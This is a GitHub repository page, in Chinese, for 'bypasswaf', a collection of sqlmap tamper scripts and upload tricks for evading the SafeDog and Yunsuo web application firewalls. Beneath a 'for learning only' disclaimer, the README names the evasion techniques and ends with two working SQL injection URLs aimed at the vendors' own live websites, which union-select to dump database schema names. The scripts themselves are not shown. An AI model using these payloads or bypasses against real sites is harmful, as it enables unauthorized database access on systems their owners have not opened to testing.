Skip to content
/ bypasswaf Public
forked from pureqh/bypasswaf

关于安全狗和云锁的自动化绕过脚本

0 stars 110 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ndb000901/bypasswaf

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

49 Commits

README.md

README.md

 
 

huanhang.png

huanhang.png

 
 

safedog_sql_tamper.py

safedog_sql_tamper.py

 
 

safedog_upload_huanhang.txt

safedog_upload_huanhang.txt

 
 

safedog_upload_yichu.txt

safedog_upload_yichu.txt

 
 

yichu.png

yichu.png

 
 

yunsuo_sql_tamper.py

yunsuo_sql_tamper.py

 
 

Repository files navigation

bypasswaf

仅供学习 请勿用作非法用途

2.0:
增加优化了部分规则 现在bypass云锁tamper及bypass安全狗tamper支持所有的注入类型了!
更新了bypass 安全狗 任意文件上传的方法(适用于业务系统存在任意文件上传漏洞但是服务器安装了安全狗环境)
更新了bypass 安全狗 SQL注入tamper,现在支持所有类型的注入了

针对最新版云锁和安全狗的sqlmap自动化绕过脚本

包含:
bypass安全狗sql注入tamper
bypass云锁SQL注入tamper (可0警告绕过云锁)
理论上来说规则越多速度也会越慢 所以不追求隐蔽性的可以按需求修改规则

针对最新版安全狗的任意文件上传bypass

safedog_upload_yichu.txt
Image text safedog_upload_huanhang.txt
Image text

利用知识点:

安全狗:内联注释
blog:https://pureqh.top/?p=1882
云锁:引号包裹注释符绕过检测
blog:https://pureqh.top/?p=4175
云锁:多行注释符嵌入#绕过检测
blog:https://pureqh.top/?p=4414
文件上传:Content-Disposition参数溢出、文件名换行绕过
blog:https://pureqh.top/?p=1225

注:bypass云锁官网

http://help.yunsuo.com.cn/guide/install/?id=1' REGEXP "[…%252523]" union select 1,group_concat(schema_name),3 from information_schema.schemata -- +

注:bypass安全狗官网

https://www.safedog.cn/news.html?id=4046' "/*" /*!11444union all select 1,(select group_concat(schema_name) from information_schema.schemata) ,3 */ --+

About

关于安全狗和云锁的自动化绕过脚本

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%